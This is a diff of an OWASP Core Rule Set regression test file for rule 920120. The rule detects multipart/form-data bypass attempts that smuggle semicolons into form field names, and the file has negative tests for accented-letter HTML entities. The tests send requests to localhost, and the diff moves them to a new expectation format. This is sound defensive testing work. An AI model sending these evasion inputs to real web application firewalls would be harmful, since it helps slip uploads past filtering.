stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 14 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 15 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 16 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 17 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mZ;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mZ;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[anoi]tilde;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-31 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-32 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-33 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-34 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-35 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-36 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." 
